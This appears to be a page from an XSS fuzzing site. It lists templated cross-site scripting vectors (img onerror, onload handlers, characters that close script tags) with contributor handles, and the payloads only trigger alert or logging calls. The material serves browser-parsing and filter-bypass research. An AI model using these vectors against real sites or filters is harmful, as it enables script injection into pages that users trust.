
Featured vector
Chrome 0.0
<!-- sample vector --> <img src=xx:xx 0x0aonerror=alert(1)>
<!-- sample vector --> <img src=xx:xx 0x0aonerror=alert(1)>
Fuzz vector cloud
Anchor Attributes CSS Closing Comments HTML HTML5 JavaScript Property Protocol Script URL XSS attribute bla bypass challenge char comment data encoding entities entity event events flash for fun handler href img innerHTML navigateURL onload prompt properties regex space src string strings style svg tag tags test testing uri waf xml
3,424,392 Successful fuzzes
Fuzz Vectors
Searching for "tags"
Your browser identified asGeneral Crawlers unknown
All vectors
Description | Vector | Created by |
---|---|---|
Tags with JS capable Events | <*datahtmlelements* src *dataevents*="customLog('*datahtmlelements* *dataevents*')"></*datahtmlelements*> | @Lamp_AE |
Tags with Onerror | <*datahtmlelements* src onerror="customLog('*datahtmlelements*')"></*datahtmlelements*> | @Lamp_AE |
Characters that end script tags | <script*chr*test>logChr(*num*)</script> | @JohnathanKuskos |
Characters that close tags | <script*chr*logChr(*num*)</script> | @blubbfiction |
Characters that can be used close tags2 | <script>logChr(*num*)<*chr*script></script> | @tifkin_ |
Characters that can be used close tags | <script>logChr(*num*)<*chr*script> | @tifkin_ |
Tags that have the onload event | <*datahtmlelements* onload="customLog('*datahtmlelements*')">test</*datahtmlelements*> | @garethheyes |
Characters that trigger a new attr after new line | <img src=1 title= x:xx*chr*/onerror=logChr(*num*)> | @garethheyes |
Characters ending HTML closing tags (HTML4) | <style></style*chr*<img src="about:blank" onerror=log(*num*)//></style> | @0x6D6172696F |
Events in tags with src or href that execute javascript | <*datahtmlelements* data=about:blank background=about:blank action=about:blank type=image/gif src=about:blank href=about:blank *dataevents*="customLog('*datahtmlelements* *dataevents*')"></*datahtmlelements*> | @garethheyes |
Tags and events that execute javascript 2 | <*datahtmlelements* *dataevents*="javascript:parent.customLog('*datahtmlelements* *dataevents*')"></*datahtmlelements*> | @garethheyes |
Tags and events that execute javascript | <*datahtmlelements* *datahtmlattributes*="javascript:parent.customLog('*datahtmlelements* *datahtmlattributes*')"></*datahtmlelements*> | @garethheyes |
Tags that execute onerror | <*datahtmlelements* src=1 href=1 onerror="customLog('*datahtmlelements*')"></*datahtmlelements*> | @garethheyes |
Determine what character can replace in end tags | <script>log(*num*)<*chr*script> | @MisterJyu |
Characters that close HTML tags | <script>log(*num*)</script*chr* | @0x6D6172696F |